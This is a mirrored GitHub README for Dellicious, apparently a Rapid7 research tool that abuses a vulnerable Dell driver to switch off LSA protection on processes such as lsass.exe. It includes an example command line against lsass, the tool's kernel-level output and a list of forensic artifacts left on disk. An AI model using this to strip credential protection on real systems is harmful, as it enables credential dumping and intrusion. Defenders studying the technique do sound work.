timwhitez starred dellicious
2023-3-1 10:48:26 Author: github.com(查看原文) 阅读量:6 收藏

Dellicious is a tool for enabling/disabling LSA protection on arbitrary processes via a vulnerability in Dell's DBUtilDrv2.sys driver (version 2.5 or 2.7). If provided the driver, Dellicious installs it, exploits it, and then removes it. That obviously requires administrator access, but that's fairly normal for LSA Protect bypass techniques. See:

  • PPLKiller - LSA protect bypass using rtcore.sys (and a large influence on this project)
  • mimidrv - Mimikatz kernel driver. LSA protect bypass by being a signed kernel driver :-D

LSA protection blocks memory access from other processes (a bit of an oversimplifaction but forgive me). When enabled lsass.exe can't have it's memory dumped by tools like mimikatz. Obviously, running mimikatz is extremely desirable for an attacker. Using this tool the attacker is able to disable the protection and dump/access memory.

Similarly, it may be desirable to enable memory protection on our own processes. So Dellicious exposes that functionality as well.

For more reading on LSA protection, I suggest the blog Do You Really Know About LSA Protection (RunAsPPL)? by Clement Labro (the author of PPLDump).

Where are the drivers?!

Rapid7 isn't comfortable redistributing the drivers. However, the required files have the following sha-1 hashes:

dbutildrv2.sys version 2.5

dbutildrv2.sys version 2.7

Example CLI Usage

In the following, lsass.exe is pid 736. I've instructed Dellicious to disable protection using DBUtilDrv2.sys version 2.7.

option "pid" is required
Allowed options:
  -h, --help             produce help message
  -p, --pid arg          the target pid
  -e, --enable arg       enable memory protection (0 or 1)
  -d, --driver_path arg  The path to the driver inf, cat, and sys (and coinstaller)

C:\Users\albinolobster\Desktop>.\dellicious.exe -p 736 -e 0 -d C:\Users\albinolobster\Desktop\drivers\2_7\
[+] User provided pid: 736
[+] User provided driver directory: C:\Users\albinolobster\Desktop\drivers\2_7\
[+] Windows version found: 2009
[+] Using offsets:
        UniqueProcessIdOffset = 0x440
        ActiveProcessLinkOffset = 0x448
        SignatureLevelOffset = 0x878
[+] Attempting driver install...
[+] Driver installed!
[+] Device handle has been obtained @ \\.\DBUtil_2_5
[+] Ntoskrnl base address: fffff80229200000
[+] PsInitialSystemProcess address: ffffd00336c92180
[+] Target process address: ffffd00338c970c0
[+] Current SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer bits (plus 5 bytes): 40c0000041083c
[+] Writing flags back as: 40c00000000000
[+] Done!
[+] Removing device
[!] Clean exit! o7


This does leave artifacts on disk. Currently I don't clean up:

  • Files in C:\Windows\Temp\
  • Logging data in C:\Windows\INF\setupapi.dev
  • DBUtilDrv2 service is left running (although it's in a bad / unusable state and will go away on reboot)
  • DBUtilDrv2 is left in the driverstore
  • I'm sure there are things in the event log that indicate driver installed / removed, etc.


This codebase is heavily influenced by PPLKiller (mentioned above). It also was influenced by the dbutil_2_3.sys metasploit module as well as Mitch Zakocs' write up on CVE-2021-21551.

文章来源: https://github.com/jbaines-r7/dellicious